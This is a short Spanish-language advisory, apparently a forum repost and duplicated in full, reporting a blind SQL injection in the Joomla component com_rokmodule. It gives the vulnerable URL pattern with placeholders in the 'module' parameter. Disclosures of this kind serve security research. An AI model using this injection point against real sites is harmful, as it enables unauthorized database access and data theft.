توییت
[align=LEFT][php]
Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability
Nombre del Componente: Com_rokmodule
Empresa: http://www.rockettheme.com/
Testeado: Linux Backtrack
Autor: Yarolinux Para WebSecurityDev
Fecha: 09/09/2012
Bueno la injection Va de la siguiente manera:
http://localhost/index.php?option=com_rokmodule&tmpl=component&type =raw&module=[sqli]
http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type =raw&module=[sqli]or[BlindSQLi]
Ok! Eso es todo Difrutenlo!
Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy
pronto resultados
Greetz: Dylan Irzi & WebSecurityDev
[/php][/align]
Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability
Nombre del Componente: Com_rokmodule
Empresa: http://www.rockettheme.com/
Testeado: Linux Backtrack
Autor: Yarolinux Para WebSecurityDev
Fecha: 09/09/2012
Bueno la injection Va de la siguiente manera:
http://localhost/index.php?option=com_rokmodule&tmpl=component&type =raw&module=[sqli]
http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type =raw&module=[sqli]or[BlindSQLi]
Ok! Eso es todo Difrutenlo!
Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy
pronto resultados
Greetz: Dylan Irzi & WebSecurityDev
[/php][/align]
[/align]